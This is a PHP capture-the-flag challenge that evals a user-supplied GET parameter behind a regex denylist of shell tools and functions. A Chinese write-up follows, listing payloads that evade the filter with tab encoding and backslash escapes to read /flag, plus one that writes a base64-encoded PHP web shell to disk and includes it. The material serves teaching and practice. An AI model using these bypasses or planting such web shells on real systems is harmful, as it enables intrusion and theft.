<?php
// Challenge entry point: prints its own source, then eval()s the `code` GET
// parameter after a regex denylist. The denylist is the only control in front
// of eval(), which is why the script is exploitable (see the writeup below).
highlight_file(__FILE__); // intentional source disclosure so players can read the filter
if(isset($_GET['code'])){
$code=$_GET['code']; // attacker-controlled string; never validated beyond the regex below
// Case-insensitive substring denylist. It matches a literal space (the ` ` alternative)
// and the metacharacters `$ * + ^ .`, but not other whitespace (e.g. a tab) and not a
// backslash placed inside a word — both of which the payloads below rely on. A denylist
// in front of eval() is not a security boundary: the only real mitigation is to remove
// eval() of user input entirely.
if (!preg_match('/sys|pas|read|file|ls|cat|tac| |head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$code)){
eval($code); // remote code execution sink: any PHP not caught by the regex runs here
echo '<br>';
echo '<img src="./dududadadudu.png" alt="Top Image" style="display: block; margin: 0 auto; max-width: 20%; height: auto;">';
echo '<audio controls>';echo '<source src="./dududadudada.mp3" type="audio/mpeg">';
} else {
// Filter hit: show the "blocked" image and stop.
echo '<img src="./redhot.jpg" alt="Top Image" style="display: block; margin: 0 auto; max-width: 70%; height: auto;">';
die("这都不能bypass?不准你玩cod"); }
} else {
// No `code` parameter supplied: show the "banned" page.
echo "喜欢用轮椅枪是吧,账号给你ban了!";
echo '<img src="./ban.png" alt="Top Image" style="display: block; margin: 0 auto; max-width: 70%; height: auto;">';
}
未过滤exec、nl、tee、print、var_dump、include
payload1:
?code=var_dump(exec("c\at%09/flag"));
?code=var_dump(exec("nl%09/flag"));
?code=print(exec("c\at%09/flag"));
?code=print(exec("nl%09/flag"));
?code=exec("c\at%09/flag|tee%09a");
?code=exec("nl%09/flag|tee%09a");
?code=print(exec("ec\ho%09`env`"));
payload2:
写入一句话木马 <?php eval($_POST[1]); ?>
?code=exec("ec\ho%09PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==|ba\se64%09-d%09>11");
?code=include(11); POST:1=system('cat /flag');